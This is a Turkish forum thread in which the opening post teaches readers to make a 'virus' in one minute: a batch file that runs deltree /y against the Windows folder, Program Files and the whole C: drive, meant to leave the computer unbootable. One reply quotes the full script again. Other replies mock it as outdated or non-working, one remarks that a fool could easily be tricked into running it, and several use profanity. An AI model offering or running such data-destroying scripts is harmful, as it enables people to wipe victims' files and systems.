1 Dakikada Virüs Yapın (Cok Basit)
-
Çok basit yöntemlerle 1 dk içinde format atan(ve attıktan sonra bilgisayar açılmıyor) virus yapabilirsiniz.
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::format yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır -
SEN FORMU GEZDİNMİ BU KONUDAN FORMDA 15 AŞKIN BAŞLIK DEGİŞİK İÇERİK AYNI KONU VAR PAYLAŞMIŞSIN BU DAVRANIŞIN GÜZEL AMA KONU AÇMADAN ÖNCE FORUMU GEZSEN İYİ OLUR AYRICA BU BENİM TARAFIMDAN DEDENMİŞTİR ÇALIŞMIYOR :D:D
-
enayi birisine çok kolay yutturursun
-
cezaa1905 bunu yazdı:
enayi birisine çok kolay yutturursun
ARKADAŞIM ÇALIŞTIGINI GÖRDÜNMÜ YADA MAKİNADA DENEDİNMİ BEN ŞAHSEN ELLİ DEFA DENEDİM HİÇ BİRŞEY OLMADI -
hoca windowsu sildin anladım programfilesi sildin onuda anladımda c yi neden siliyorsun zaten hepsi C de değilmi:) ya sadece C yi sil yada hiç fazla fazla kod ekleme:))))))
dediğin şey fat olacak 98 olack gerisi yalan... -
Sen buna virüs mü diyon :D Nasıl yayılıyo peki.
Anladığım kadarıyla manuel çalışıyo bu virüs eeuheueeuhe
-
yeter artık a.k siktiniz forumunu şunun açtığı başlığa bak ya ona virüs diyenin aklını sikiym ben. sanki bide marifetmiş gibi yazmış buraya. adam akıllı şeyler yapacaksanız yazın yoksada sktrn gidin
-
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:(sadece dos ortanımda yazılanı göstermez) @echo off
()ancak ve ancak kurban malsa vede windows diye bi klasöre kurduysa işler C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
(niye iki kere onu anlamadım) cls
cls
(yazılan görünür ancak bunu yiyen bbensen güler geçerim yazanıda ayıplar lamer derim)@echo .::format yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.HazırKim yazdı bunu ya ? dos nezamandır virüs oldu avayip güldüm halada gülüyorum kızmada dostum hiçmi xp den haberin yok ya adam 2000 kullanıyosa ve windows klasörü winnt ise nereyi silecek bu dosya hahaha oyunu bırakın ya düzgün bişeler yapın.